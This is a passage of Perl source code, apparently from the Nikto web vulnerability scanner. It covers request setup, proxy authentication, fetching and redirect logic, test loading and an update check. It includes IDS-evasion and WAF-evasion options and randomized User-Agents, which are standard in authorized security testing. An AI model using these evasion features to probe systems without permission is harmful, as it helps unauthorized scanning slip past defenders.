$mark->{'ssl'} ? 'https' : 'http';\n\n    # Get hostname (prefer vhost if present)\n    my $hostname = $mark->{'vhost'} ? $mark->{'vhost'} : $mark->{'hostname'};\n\n    # Get port\n    my $port = $mark->{'port'} || ($mark->{'ssl'} ? 443 : 80);\n\n    # Get GMT timestamp in format YYYY:MM:DD:HH:MM:SSGMT\n    my @gmt = gmtime(time);\n    my $timestamp = sprintf(\"%04d:%02d:%02d:%02d:%02d:%02dGMT\",\n                            $gmt[5] + 1900,    # year\n                            $gmt[4] + 1,       # month\n                            $gmt[3],           # day\n                            $gmt[2],           # hour\n                            $gmt[1],           # minute\n                            $gmt[0]\n                            );    # second\n\n    # Generate MD5 hash\n    my $scanid = LW2::md5(\"$protocol://$hostname:$port/$timestamp\");\n\n    return $scanid;\n}\n\n###############################################################################\nsub report_host_start {\n    my ($mark) = @_;\n\n    # Generate scanid for SQL reporting plugins\n    $mark->{'scanid'} = generate_scanid($mark);\n\n    # Go through all reporting modules\n    foreach my $reporter (@REPORTS) {\n        if (defined $reporter->{host_start}) {\n            &{ $reporter->{host_start} }($reporter->{handle}, $mark);\n        }\n    }\n}\n\n###############################################################################\nsub report_host_end {\n    my ($mark) = @_;\n\n    # Go through all reporting modules\n    foreach my $reporter (@REPORTS) {\n        if (defined $reporter->{host_end}) {\n            &{ $reporter->{host_end} }($reporter->{handle}, $mark);\n        }\n    }\n}\n\n###############################################################################\nsub report_summary {\n    my ($mark) = @_;\n\n    # Go through all reporting modules\n    foreach my $reporter (@REPORTS) {\n        if (defined $reporter->{summary}) {\n            &{ $reporter->{summary} }($reporter->{handle}, $mark);\n        }\n    }\n}\n\n###############################################################################\nsub report_item {\n    my ($mark, $item) = @_;\n    if (($item->{'uri'} eq 'undef') || ($item->{'uri'} eq '')) {\n        $item->{'uri'} = '/';\n    }\n\n    # Go through all reporting modules\n    foreach my $reporter (@REPORTS) {\n        if (defined $reporter->{item}) {\n            &{ $reporter->{item} }($reporter->{handle}, $mark, $item);\n        }\n    }\n}\n\n###############################################################################\nsub report_ssl_info {\n    my ($mark) = @_;\n\n    # Only report SSL info if SSL is enabled and info is available\n    return unless ($mark->{'ssl'} && defined $mark->{'ssl_cipher'});\n\n    # Go through all reporting modules\n    foreach my $reporter (@REPORTS) {\n        if (defined $reporter->{ssl_info}) {\n            &{ $reporter->{ssl_info} }($reporter->{handle}, $mark);\n        }\n    }\n}\n\n###############################################################################\nsub report_close {\n\n    # Go through all reporting modules\n    foreach my $reporter (@REPORTS) {\n\n        # Explicitly flush the handle before closing to ensure all data is written\n        if (defined $reporter->{handle}) {\n            my $fh = $reporter->{handle};\n\n            # Only flush file handles (GLOB refs), not database handles or other types\n            if (ref($fh) eq 'GLOB') {\n\n                # Ensure autoflush is enabled\n                $fh->autoflush(1);\n\n                # Try to flush explicitly if method exists\n                if ($fh->can('flush')) {\n                    eval { $fh->flush(); };\n                }\n            }\n        }\n\n        # Call plugin's close function (it may close the handle itself)\n        if (defined $reporter->{close}) {\n            &{ $reporter->{close} }($reporter->{handle});\n        }\n\n        # Explicitly close file handles after plugin's close (in case plugin didn't close it)\n        # Only close GLOB file handles, not database handles (DBI) or STDOUT\n        if (defined $reporter->{handle} && ref($reporter->{handle}) eq 'GLOB') {\n\n            # Don't close STDOUT/STDERR\n            if ($reporter->{handle} ne \\*STDOUT && $reporter->{handle} ne \\*STDERR) {\n                eval { close($reporter->{handle}); };\n            }\n        }\n    }\n}\n\n###############################################################################\n# portions of this sub were taken from the Term::ReadPassword module.\n# It has been modified to not require Term::ReadLine, but still requires\n# POSIX::Termios if it's a POSIX machine\n###############################################################################\nsub read_data {\n    if ($CONFIGFILE{PROMPTS} eq 'no') { return; }\n    my ($prompt, $mode, $POSIX) = @_;\n    my $input;\n\n    my %SPECIAL = (\"\\x03\" => 'INT',    # Control-C, Interrupt\n                   \"\\x08\" => 'DEL',    # Backspace\n                   \"\\x7f\" => 'DEL',    # Delete\n                   \"\\x0d\" => 'ENT',    # CR, Enter\n                   \"\\x0a\" => 'ENT',    # LF, Enter\n                   );\n\n    local (*TTY, *TTYOUT);\n    open TTY,    \"<&STDIN\"   or return;\n    open TTYOUT, \">>&STDOUT\" or return;\n\n    # Don't buffer it!\n    select((select(TTYOUT), $| = 1)[0]);\n    print TTYOUT $prompt;\n\n    # Remember where everything was\n    my $fd_tty = fileno(TTY);\n    my $term   = POSIX::Termios->new();\n    $term->getattr($fd_tty);\n    my $original_flags = $term->getlflag();\n\n    if ($mode eq \"noecho\") {\n        my $new_flags = $original_flags & ~(ISIG | ECHO | ICANON);\n        $term->setlflag($new_flags);\n    }\n    $term->setattr($fd_tty, TCSAFLUSH);\n  KEYSTROKE:\n    while (1) {\n        my $new_keys = '';\n        my $count    = sysread(TTY, $new_keys, 99);\n        if ($count) {\n            for my $new_key (split //, $new_keys) {\n                if (my $meaning = $SPECIAL{$new_key}) {\n                    if    ($meaning eq 'ENT') { last KEYSTROKE; }\n                    elsif ($meaning eq 'DEL') { chop $input; }\n                    elsif ($meaning eq 'INT') { last KEYSTROKE; }\n                    else                      { $input .= $new_key; }\n                }\n                else { $input .= $new_key; }\n            }\n        }\n        else { last KEYSTROKE; }\n    }\n\n    # Done with waiting for input. Let's not leave the cursor sitting\n    # there, after the prompt.\n    print TTY \"\\n\";\n    nprint(\"\\n\");\n\n    # Let's put everything back where we found it.\n    $term->setlflag($original_flags);\n    $term->setattr($fd_tty, TCSAFLUSH);\n    close(TTY);\n    close(TTYOUT);\n\n    return $input;\n}\n\n###############################################################################\nsub proxy_check {\n    my ($mark) = @_;\n\n    setup_hash(\\%request, $mark, \"Proxy Check\");\n    if (($request{'whisker'}->{'proxy_host'} ne '') && ($CLI{'useproxy'}))    # proxy is set up\n    {\n        LW2::http_close(\\%request);    # force-close any old connections\n        $request{'whisker'}->{'method'} = \"GET\";\n        $request{'whisker'}->{'uri'}    = \"/\";\n\n        LW2::http_fixup_request(\\%request);\n\n        sleeper();\n        LW2::http_do_request_timeout(\\%request, \\%response);\n        $COUNTERS{'totalrequests'}++;\n        dump_var(\"Request Hash\", \\%request,\n                 ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'}));\n        dump_var(\"Response Hash\",\n                 \\%response, ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'}));\n\n        # First check that we can connect to the proxy\n        if (exists $response{'whisker'}{'error'}) {\n            if ($response{'whisker'}{'error'} =~ /Transport endpoint is not connected/) {\n                nprint(\"+ ERROR: Could not connect to the defined proxy $CONFIGFILE{PROXYHOST}\");\n            }\n            nprint(\"+ ERROR: Proxy error: $response{'whisker'}{'error'}\");\n            exit 1;\n        }\n\n        if ($response{'whisker'}{'code'} eq \"407\")    # proxy requires auth\n        {\n\n            # have id/pw?\n            if ($CONFIGFILE{PROXYUSER} eq \"\") {\n                $CONFIGFILE{PROXYUSER} = read_data(\"Proxy ID: \",   \"\");\n                $CONFIGFILE{PROXYPASS} = read_data(\"Proxy Pass: \", \"noecho\");\n            }\n            if ($response{'proxy-authenticate'} !~ /Basic/i) {\n                my @x = split(/ /, $response{'proxy-authenticate'});\n                nprint(\n                    \"+ Proxy server uses '$x[0]' rather than 'Basic' authentication. $VARIABLES{'name'} $VARIABLES{'version'} can't do that.\"\n                    );\n                exit 1;\n            }\n\n            # test it...\n            LW2::http_close(\\%request);    # force-close any old connections\n            LW2::auth_set(\"proxy-basic\", \\%request, $CONFIGFILE{PROXYUSER}, $CONFIGFILE{PROXYPASS})\n              ;                            # set auth\n            LW2::http_fixup_request(\\%request);\n            sleeper();\n            LW2::http_do_request_timeout(\\%request, \\%response);\n            $COUNTERS{'totalrequests'}++;\n            dump_var(\"Request Hash\", \\%request,\n                     ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'}));\n            dump_var(\"Response Hash\",\n                     \\%response, ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'}));\n\n            if ($response{'proxy-authenticate'} ne \"\") {\n                my @pauthinfo  = split(/ /, $response{'proxy-authenticate'});\n                my @pauthinfo2 = split(/=/, $response{'proxy-authenticate'});\n                $pauthinfo2[1] =~ s/^\\\"//;\n                $pauthinfo2[1] =~ s/\\\"$//;\n                nprint(\n                    \"+ Proxy requires authentication for '$pauthinfo[0]' realm '$pauthinfo2[1]', unable to authenticate.\"\n                    );\n                exit 1;\n            }\n            else { nprint(\"- Successfully authenticated to proxy.\", \"v\", undef); }\n        }\n    }\n\n    return;\n}\n\n#######################################################################\nsub dump_var {\n    return if !$OUTPUT{'debug'};\n    my $msg     = $_[0];\n    my %hash_in = %{ $_[1] };\n    my @scrubs;\n    for (my $i = 2 ; $i <= $#_ ; $i++) {\n        push(@scrubs, $_[$i]);\n    }\n    my $display = LW2::dump('', \\%hash_in);\n    my $new;\n    $display =~ s/^\\$/'$msg'/;\n    if ($OUTPUT{'scrub'}) {\n        $new = \"\";\n        foreach my $line (split(/\\n/, $display)) {\n            $line = scrub($line, @scrubs);\n            $new .= \"$line\\n\";\n        }\n        $display = $new;\n    }\n    nprint($display, \"d\");\n    return;\n}\n\n#######################################################################\nsub get_ua {\n\n    # Always honor command line\n    if ($CLI{'useragent'}) {\n        return $CLI{'useragent'};\n    }\n\n    # Return a random User-Agent from @USERAGENTS array\n    if (   defined($VARIABLES{'@USERAGENTS'})\n        && ref($VARIABLES{'@USERAGENTS'}) eq 'ARRAY'\n        && @{ $VARIABLES{'@USERAGENTS'} }) {\n        my $ua = $VARIABLES{'@USERAGENTS'}->[ rand(@{ $VARIABLES{'@USERAGENTS'} }) ];\n        $ua =~ s/^\"//;\n        $ua =~ s/\"$//;\n        return $ua;\n    }\n    return undef;\n}\n\n#######################################################################\nsub setup_hash {\n    my ($reqhash, $mark, $testid) = @_;\n\n    # Clear the hash first (like LW2::http_init_request does)\n    %$reqhash = ();\n\n    # Initialize the whisker hash\n    $reqhash->{'whisker'} = {};\n\n    # Cache whisker hash reference to avoid repeated dereferencing\n    my $whisker = $reqhash->{'whisker'};\n\n    # Set all required whisker properties (matching LW2::http_init_request defaults)\n    $whisker->{'http_space1'}                   = ' ';\n    $whisker->{'http_space2'}                   = ' ';\n    $whisker->{'version'}                       = $CONFIGFILE{'DEFAULTHTTPVER'} || '1.1';\n    $whisker->{'method'}                        = 'GET';\n    $whisker->{'protocol'}                      = 'HTTP';\n    $whisker->{'port'}                          = $mark->{'port'} || 80;\n    $whisker->{'uri'}                           = '/';\n    $whisker->{'uri_prefix'}                    = '';\n    $whisker->{'uri_postfix'}                   = '';\n    $whisker->{'uri_param_sep'}                 = '?';\n    $whisker->{'host'}                          = $mark->{'hostname'} || $mark->{'ip'};\n    $whisker->{'timeout'}                       = $CLI{'timeout'}     || 10;\n    $whisker->{'include_host_in_uri'}           = 0;\n    $whisker->{'ignore_duplicate_headers'}      = 0;\n    $whisker->{'normalize_incoming_headers'}    = 1;\n    $whisker->{'lowercase_incoming_headers'}    = 1;\n    $whisker->{'require_newline_after_headers'} = 0;\n    $whisker->{'invalid_protocol_return_value'} = 1;\n    $whisker->{'ssl'}                           = $mark->{'ssl'} || 0;\n    $whisker->{'ssl_save_info'}                 = 1;\n    $whisker->{'http_eol'}                      = \"\\x0d\\x0a\";\n    $whisker->{'force_close'}                   = 0;\n    $whisker->{'force_open'}                    = 0;\n    $whisker->{'retry'}                         = 0;\n    $whisker->{'trailing_slurp'}                = 0;\n    $whisker->{'force_bodysnatch'}              = 0;\n    $whisker->{'max_size'}                      = 750000;\n    $whisker->{'MAGIC'}                         = 31339;\n\n    # Set SSL-specific fields if needed\n    if ($mark->{'ssl'}) {\n        $whisker->{'ssl_rsacertfile'} = $mark->{'key'};\n        $whisker->{'ssl_certfile'}    = $mark->{'cert'};\n    }\n\n    # Set evasion only if needed\n    $whisker->{'anti_ids'} = $CLI{'evasion'} if (length($CLI{'evasion'}));\n\n    # Set default headers (like LW2::http_init_request does)\n    $reqhash->{'Connection'} = 'Keep-Alive';\n\n    # Random User-Agent\n    $reqhash->{'User-Agent'} = get_ua();\n\n    # Set Host header only if vhost is configured\n    if ($mark->{'has_vhost'}) {\n        $reqhash->{'Host'} = $mark->{'vhost'};\n    }\n\n    # Proxy configuration\n    if (length($CONFIGFILE{PROXYHOST}) && $CLI{'useproxy'}) {\n        $whisker->{'proxy_host'} = $CONFIGFILE{'PROXYHOST'};\n        $whisker->{'proxy_port'} = $CONFIGFILE{'PROXYPORT'};\n\n        # Set proxy auth only if credentials are provided\n        if (length($CONFIGFILE{'PROXYUSER'})) {\n            LW2::auth_set(\"proxy-basic\", $reqhash,\n                          $CONFIGFILE{'PROXYUSER'},\n                          $CONFIGFILE{'PROXYPASS'});\n        }\n    }\n\n    return $reqhash;\n}\n\n#######################################################################\nsub running_average {\n    my $last = shift;\n    my ($mark) = @_;\n\n    # Use push instead of unshift for better performance\n    push(@{ $mark->{'running_avg'} }, $last);\n\n    # Only splice if we exceed the limit (more efficient than always splicing)\n    if (@{ $mark->{'running_avg'} } > 100) {\n        splice(@{ $mark->{'running_avg'} }, 0, @{ $mark->{'running_avg'} } - 100);\n    }\n}\n\n#######################################################################\nsub running_average_print {\n    use List::Util qw(sum);\n    my ($mark)   = @_;\n    my @data     = @{ $mark->{'running_avg'} };\n    my $elements = @data;                         # More efficient than $#data + 1\n\n    return \"Running average: Not enough data.\" if $elements == 0;\n\n    my $message = '';\n\n    if ($elements == 100) {\n        my $avg = sum(@data) / $elements;\n        $message = sprintf(\"100 requests: %.5f sec, \", $avg);\n    }\n\n    if ($elements > 10) {\n        my @recent_data  = @data[ ($#data - 9) .. $#data ];\n        my $recent_count = @recent_data;\n        my $avg          = sum(@recent_data) / $recent_count;\n        $message .= sprintf(\"10 requests: %.4f sec\", $avg);\n    }\n\n    return \"Running average: $message.\";\n}\n\n#######################################################################\nsub nfetch {\n    my ($mark, $uri, $method, $data, $headers_send, $flags, $testid, $httpver) = @_;\n    my (%request, %response);\n    setup_hash(\\%request, $mark, $testid);\n\n    # Ensure $flags is a hash reference (handle cases where empty string is passed)\n    if (!ref($flags) || ref($flags) ne 'HASH') {\n        $flags = {};\n    }\n\n    # Check for keyboard input  & terminate flag\n    if (!$CLI{'nointeractive'} && !(($COUNTERS{'totalrequests'} % 10))) {\n        $mark->{'terminate'} = 1 if (check_input($mark) eq 'term');\n    }\n\n    # Check execution time\n    if (my $maxtime = $CLI{'maxtime'}) {\n\n        # Cache start_time to avoid repeated hash access\n        my $start_time = $mark->{'start_time'};\n        if ((time() - $start_time) > $maxtime) {\n            nprint(\"+ ERROR: Host maximum execution time of $maxtime seconds reached\");\n            $mark->{'terminate'} = 1;\n        }\n    }\n\n    # Prepend -root option's value if set\n    $request{'whisker'}->{'uri'} = $mark->{'root'} . $uri;\n\n    # Remove trailing slash if requested\n    $request{'whisker'}->{'uri'} =~ s/\\/$// if ($CLI{'noslash'});\n\n    $request{'whisker'}->{'method'} = $method;\n\n    # POST data?\n    if (length($data)) {\n        $data =~ s/\\\\\\\"/\\\"/g;\n        $request{'whisker'}->{'data'} = $data;\n    }\n\n    # Default an unobtrusive headers to help WAF evasion\n    $request{'whisker'}->{'Accept'} =\n      'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8';\n    $request{'whisker'}->{'Accept-Language'}           = 'en-US,en;q=0.5';\n    $request{'whisker'}->{'Cache-Control'}             = 'max-age=0';\n    $request{'whisker'}->{'Connection'}                = 'keep-alive';\n    $request{'whisker'}->{'Upgrade-Insecure-Requests'} = '1';\n    $request{'whisker'}->{'Sec-Fetch-Dest'}            = 'document';\n    $request{'whisker'}->{'Sec-Fetch-Mode'}            = 'navigate';\n    $request{'whisker'}->{'Sec-Fetch-Site'}            = 'none';\n    $request{'whisker'}->{'Sec-Fetch-User'}            = '?1';\n\n    # Check for extra HTTP headers\n    if (ref($headers_send) eq \"HASH\") {\n\n        # Use explicit hash assignment instead of slice assignment\n        foreach my $key (keys %$headers_send) {\n            $request{$key} = $headers_send->{$key};\n        }\n    }\n\n    # Add custom headers from CLI if any\n    if (defined $CLI{'headers'} && @{ $CLI{'headers'} }) {\n        foreach my $header (@{ $CLI{'headers'} }) {\n            if ($header =~ /^([^:]+):\\s*(.+)$/) {\n                my ($headername, $value) = ($1, $2);\n                $request{$headername} = $value;\n            }\n        }\n    }\n\n    # Set auth\n    if (my $realm = $mark->{'realms'}{'default'}) {\n        if (length($realm->{'authtype'})) {\n            LW2::auth_set($realm->{'authtype'}, $request, $realm->{'id'}, $realm->{'password'});\n        }\n    }\n\n    # Set cookies\n    LW2::cookie_write($mark->{'cookiejar'}, \\%request, 1) if defined($mark->{'cookiejar'});\n\n    # Override HTTP version\n    $request{'whisker'}->{'version'} = $httpver if ($httpver ne '');\n\n    $request{'whisker'}->{'host'} = $mark->{'ip'} if ($flags->{'nohost'});\n\n    LW2::http_fixup_request(\\%request) unless ($flags->{'noclean'});\n\n    # Run pre hooks\n    unless ($flags->{'noprefetch'}) {\n        (%$request, %$response) = run_hooks($mark, \"prefetch\", \\%request, \\%response);\n    }\n\n    # Do the request\n    sleeper();\n    my $time = [gettimeofday];\n    LW2::http_do_request_timeout(\\%request, \\%response);\n    $COUNTERS{'totalrequests'}++;\n    if (!$VARIABLES{'MSWIN32'}) {\n        running_average(tv_interval($time, [gettimeofday]), $mark);\n    }\n\n    # If we got an error, do 1 retry - optimized\n    if (my $whisker = $response{'whisker'}) {\n        if (defined $whisker->{'error'} || $whisker->{'code'} eq '') {\n            $mark->{'failures'}++;\n            sleeper();\n            LW2::http_do_request_timeout(\\%request, \\%response);\n            $COUNTERS{'totalrequests'}++;\n        }\n    }\n\n    # Get cookies from response & add to jar\n    if (!$CLI{'nocookies'}) {\n        my $tmpjar = LW2::cookie_new_jar();\n        LW2::cookie_read(\\%tmpjar, \\%response, \\%request);\n\n        # Cache cookiejar reference to avoid repeated hash access\n        my $cookiejar = $mark->{'cookiejar'};\n\n        # Use more efficient array construction\n        foreach my $c (keys %tmpjar) {\n            my $cookie_data = $tmpjar{$c};\n            $cookiejar->{$c} =\n              [ $cookie_data->[0], $cookie_data->[1], $cookie_data->[2], undef, $cookie_data->[4] ];\n        }\n    }\n\n    # follow redirects\n    if ($CLI{'followredirects'} && ($response{'whisker'}->{'code'} =~ /^30[1278]/)) {\n        my $newlocation = $response{'location'};\n        my $port        = $mark->{'port'};\n\n        # Is a full URL redirect the same host?\n        # Pre-compute host alternatives for better performance\n        my $host_re = join '|',\n          map { quotemeta $_ } ($mark->{'ip'}, $mark->{'hostname'}, $mark->{'display_name'});\n\n        # Only build port regex if port is specified\n        if ($port && $port != 80 && $port != 443) {\n            my $port_re = '(?:\\:' . quotemeta($port) . ')?';\n            if ($response{'location'} =~ /^https?:\\/\\/($host_re)$port_re\\//i) {\n                $newlocation =~ s{^https?:\\/\\/(?:$host_re)$port_re/}{/}i;\n            }\n        }\n        else {\n            # No port needed in regex for standard ports\n            if ($response{'location'} =~ /^https?:\\/\\/($host_re)\\//i) {\n                $newlocation =~ s{^https?:\\/\\/(?:$host_re)/}{/}i;\n            }\n        }\n\n        # Cache whisker reference to avoid repeated hash access\n        my $whisker = $request{'whisker'};\n        $whisker->{'uri'} = $newlocation;\n\n        # Make redirect request\n        LW2::http_fixup_request(\\%request) unless ($flags->{'noclean'});\n        sleeper();\n        LW2::http_do_request_timeout(\\%request, \\%response);\n        $COUNTERS{'totalrequests'}++;\n    }\n\n    # Check failures\n    my $fail_limit = $CONFIGFILE{'FAILURES'};\n    if ($fail_limit > 0 && $mark->{'failures'} >= $fail_limit) {\n        nprint(\n            \"+ ERROR: *** Error limit ($CONFIGFILE{'FAILURES'}) reached for host, giving up. Last error: \"\n              . $response{'whisker'}->{'error'}\n              . \". ***\\n+ ERROR: *** Consider using mitmproxy to avoid TLS fingerprinting. ***\",\n            \"\",\n            ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'})\n            );\n        $mark->{'terminate'} = 1;\n        status_report();\n    }\n\n    if ($OUTPUT{'debug'}) {\n        dump_var(\"Request Hash\", \\%request,\n                 ($mark->{'ip'}, $mark->{'hostname'}, $mark->{'displayname'}));\n        dump_var(\"Response Hash\",\n                 \\%response, ($mark->{'ip'}, $mark->{'hostname'}, $mark->{'displayname'}));\n    }\n\n    # Snarf what we can from the whisker hash and put in mark\n    my $banner  = \\$mark->{'banner'};\n    my $whisker = $response{'whisker'};\n\n    if (!exists $whisker->{'error'}) {\n\n        # Banner processing\n        if ($$banner eq \"\") {\n            $$banner = $response{'server'};\n        }\n        elsif (   exists $response{'server'}\n               && !exists $mark->{'bannerchanged'}\n               && ($$banner ne $response{'server'})\n               && ($response{'server'} ne 'Microsoft-HTTPAPI/2.0')) {\n            $request->{'whisker'}->{'uri'} = \"/\"\n              if (   !defined $request->{'whisker'}->{'uri'}\n                  || $request->{'whisker'}->{'uri'} eq \"\"\n                  || $request->{'whisker'}->{'uri'} eq \".\");\n            add_vulnerability($mark,\n                              $request->{'whisker'}->{'uri'}\n                                . \": Server banner changed from '$$banner' to '$response{server}'\",\n                              999962,\n                              \"\",\n                              $method,\n                              $uri,\n                              $request,\n                              $response\n                              );\n            $mark->{'bannerchanged'} = 1;\n        }\n\n        # Also check X-Powered-By header for outdated version checking\n        # Only add to components if it contains version-like information (digits, slashes, or dots)\n        if (exists $response{'x-powered-by'}\n            && $response{'x-powered-by'} =~ /(?:\\d|\\/|\\.)/) {\n            my $xpb_value = $response{'x-powered-by'};\n            $xpb_value =~ s/\\s+.*$//;    # Strip any trailing whitespace/content\n            if (!exists $mark->{'components'}->{$xpb_value}) {\n                $mark->{'components'}->{$xpb_value} = 1;\n            }\n        }\n\n        # TLS\n        if (!exists $mark->{'ssl_cipher'} && $mark->{'ssl'}) {\n\n            # Cache SSL certificate array reference\n            my $altnames = $whisker->{'ssl_cert_altnames'};\n\n            # Grab ssl details\n            $mark->{'ssl_cipher'}       = $whisker->{'ssl_cipher'};\n            $mark->{'ssl_cert_issuer'}  = $whisker->{'ssl_cert_issuer'};\n            $mark->{'ssl_cert_subject'} = $whisker->{'ssl_cert_subject'};\n\n            # Process altnames correctly - Net::SSLeay::X509_get_subjectAltNames returns\n            # an array where even indices are type codes and odd indices are the actual names\n            if ($altnames && @$altnames) {\n                my @valid_names;\n                for (my $i = 1 ; $i < @$altnames ; $i += 2) {\n                    my $name = $altnames->[$i];\n\n                    # Only include DNS names (type 2) and skip numeric-only names\n                    if ($altnames->[ $i - 1 ] == 2 && $name !~ /^[\\d]+$/ && $name ne '') {\n                        push(@valid_names, $name);\n                    }\n                }\n                $mark->{'ssl_cert_altnames'} = join(', ', @valid_names);\n            }\n        }\n    }\n\n    nprint(\"- $response{'whisker'}{'code'} for $method:\\t$response{'whisker'}->{'uri_requested'}\",\n           \"v\", $testid, ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'}));\n\n    # Check for errors to reduce false positives\n    if (my $whisker = $response{'whisker'}) {\n        if ((defined $whisker->{'error'} || $whisker->{'code'} eq '')\n            && !exists $flags->{'noerror'}) {\n            $mark->{'total_errors'}++;\n            nprint(\"+ ERROR: $whisker->{'uri_requested'} returned an error: $whisker->{'error'}\\n\",\n                   \"e\", ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'}));\n            if ($whisker->{'code'} eq '502' && $CLI{'useproxy'}) {\n                nprint(\"+ ERROR: Received 502 'Bad Gateway' from proxy\\n\");\n            }\n        }\n    }\n\n    # Show cookies\n    if ($OUTPUT{'show_cookies'} && (my $cookies = $response{'whisker'}->{'cookies'})) {\n\n        # Cache frequently accessed values\n        my $uri_requested = $response{'whisker'}->{'uri_requested'};\n        my $hostname      = $mark->{'hostname'};\n        my $ip            = $mark->{'ip'};\n        my $displayname   = $mark->{'displayname'};\n\n        foreach my $c (@$cookies) {\n            nprint(\"+ $uri_requested sent cookie: $c\", \"\", ($hostname, $ip, $displayname));\n        }\n    }\n\n    # Run post hooks\n    unless ($flags->{'nopostfetch'}) {\n        ($request, %$response) = run_hooks($mark, \"postfetch\", \\%request, \\%response);\n    }\n\n    return $response{'whisker'}->{'code'}, $response{'whisker'}->{'data'},\n      $response{'whisker'}->{'error'}, \\%request, \\%response;\n}\n\n#######################################################################\nsub set_scan_items {\n    %TESTS = ();\n    $COUNTERS{total_checks} = 0;\n    my %SKIPLIST = ();\n    if (defined $CONFIGFILE{SKIPIDS}) {\n        foreach my $id (split(/ /, $CONFIGFILE{SKIPIDS})) {\n            $SKIPLIST{$id} = 1;\n        }\n    }\n    my ($includes, $excludes) = \"\";\n\n    foreach my $tune (split(//, $CLI{'tuning'})) {\n        next if ($tune eq \"x\");\n        if ($CLI{'tuning'} !~ /(?<![x])$tune/gi) {\n            $excludes .= $tune;\n        }\n        else {\n            $includes .= $tune;\n        }\n    }\n\n    # now load checks\n    foreach my $line (@DBFILE) {\n        if ($line =~ /^\\\"/)    # check\n        {\n            chomp($line);\n            my @item = parse_csv($line);\n            my $add  = 0;\n\n            # check tuning options\n            # $item[2] contains the test's types\n            if (($CLI{'tuning'} ne \"\") && (defined $item[2])) {\n\n                # Work out the required tuning from the CLI string\n                if ($includes ne \"\") {\n                    foreach $tune (split(//, $includes)) {\n                        if ($item[2] =~ /$tune/i) {\n                            $add = 1;\n                            last;\n                        }\n                    }\n                }\n                if ($excludes ne \"\") {\n\n                    # if includes is null and excludes is not null, add all but excludes\n                    foreach $tune (split(//, $excludes)) {\n                        if ($item[2] =~ /$tune/i) {\n                            $add = 0;\n                            last;\n                        }\n                        else {\n                            $add = 1;\n                        }\n                    }\n\n                }\n            }\n            else {\n                $add = 1;\n            }\n\n            # Skip list\n            if ($add && exists $SKIPLIST{ $item[0] }) {\n                $add = 0;\n            }\n\n            # If $add is still true, then add it\n            if ($add) {\n                my $ext = get_ext($item[3]);\n                $db_extensions{$ext} = 1;\n\n                $COUNTERS{total_checks}++;\n                $TESTS{ $item[0] }{'references'} = $item[1];\n                $TESTS{ $item[0] }{'tuning'}     = $item[2];\n                $TESTS{ $item[0] }{'uri'}        = $item[3];\n                $TESTS{ $item[0] }{'method'}     = $item[4];\n                $TESTS{ $item[0] }{'dsl'}        = $item[5];\n                $TESTS{ $item[0] }{'message'}    = $item[6];\n                $TESTS{ $item[0] }{'data'}       = $item[7];\n                $TESTS{ $item[0] }{'headers'}    = $item[8];\n                $TESTS{ $item[0] }{'matcher'}    = build_matcher($item[5], $item[0]);\n            }\n        }\n    }\n\n    nprint(\"- $COUNTERS{'total_checks'} server checks loaded\", \"v\", \"Init\");\n    if ($COUNTERS{'total_checks'} eq 0 && !defined $CLI{'tuning'}) {\n        nprint(\"+ Unable to load valid checks!\");\n        $mark->{'terminate'} = 1;\n    }\n    return;\n}\n#######################################################################\n# Check for updates to the program\n# Expects response like:\n# { \"products\": { \"nikto\": { \"version\": \"2.6.0\", \"epoch\": 1737935000 } } }\nsub check_updates {\n\n    # Get epoch from program/.timestamp || 0\n    my $epoch = 0;\n    my $timestamp_file =\n      defined $CONFIGFILE{'EXECDIR'} ? \"$CONFIGFILE{'EXECDIR'}/.timestamp\" : 'program/.timestamp';\n    if (-f $timestamp_file) {\n        if (open(my $fh, '<', $timestamp_file)) {\n            $epoch = <$fh>;\n            chomp($epoch);\n            close($fh);\n        }\n    }\n\n    # Request API to get manifest JSON using LibWhisker and configured proxy\n    return unless defined $CONFIGFILE{'VERSION_API'} && $CONFIGFILE{'VERSION_API'} ne '';\n\n    eval \"require JSON::PP\";\n    return if $@;\n\n    my %request;\n    my %response;\n\n    # Parse URL from config\n    my @uridata = LW2::uri_split($CONFIGFILE{'VERSION_API'});\n    my $host    = $uridata[2] || '';\n    my $port    = $uridata[3] || '';\n    my $path    = $uridata[0] || '/';\n\n    # Determine SSL and default port\n    my $ssl = ($CONFIGFILE{'VERSION_API'} =~ /^https:/i) ? 1 : 0;\n    if ($port eq '') {\n        $port = $ssl ? 443 : 80;\n    }\n\n    # Build URI with query parameters\n    my $uri = $path;\n    $uri .= ($path =~ /\\?/) ? '&' : '?';\n    $uri .= \"p=nikto&v=$VARIABLES{'version'}&e=$epoch\";\n\n    LW2::http_init_request(\\%request);\n    $request{'whisker'}->{'host'}    = $host;\n    $request{'whisker'}->{'port'}    = $port;\n    $request{'whisker'}->{'ssl'}     = $ssl;\n    $request{'whisker'}->{'uri'}     = $uri;\n    $request{'whisker'}->{'timeout'} = 5;\n\n    # Configure proxy if enabled\n    if (length($CONFIGFILE{PROXYHOST}) && $CLI{'useproxy'}) {\n        $request{'whisker'}->{'proxy_host'} = $CONFIGFILE{'PROXYHOST'};\n        $request{'whisker'}->{'proxy_port'} = $CONFIGFILE{'PROXYPORT'};\n        if (length($CONFIGFILE{'PROXYUSER'})) {\n            LW2::auth_set(\"proxy-basic\", \\%request,\n                          $CONFIGFILE{'PROXYUSER'},\n                          $CONFIGFILE{'PROXYPASS'});\n        }\n    }\n\n    LW2::http_fixup_request(\\%request);\n    LW2::http_do_request_timeout(\\%request, \\%response);\n\n    # Check if request succeeded\n    if (($response{'whisker'}->{'code'} ne '200') || ($response{'whisker'}->{'data'} eq '')) {\n        nprint(\"+ ERROR: Failed to check for updates: $response{'whisker'}->{'code'}\");\n        return;\n    }\n\n    # Parse JSON response\n    my $json_data;\n    eval { $json_data = JSON::PP->new->utf8(1)->decode($response{'whisker'}->{'data'}); };\n    return if $@ || !$json_data;\n\n    # Extract remote version and epoch\n    my $remote_version = $json_data->{'products'}->{'nikto'}->{'version'} || '';\n    my $remote_epoch   = $json_data->{'products'}->{'nikto'}->{'epoch'}   || 0;\n\n    # Compare epoch to manifest epoch\n    # If remote epoch is greater OR remote version is greater:\n    if ($remote_epoch > $epoch\n        || ($remote_version ne '' && $remote_version ne 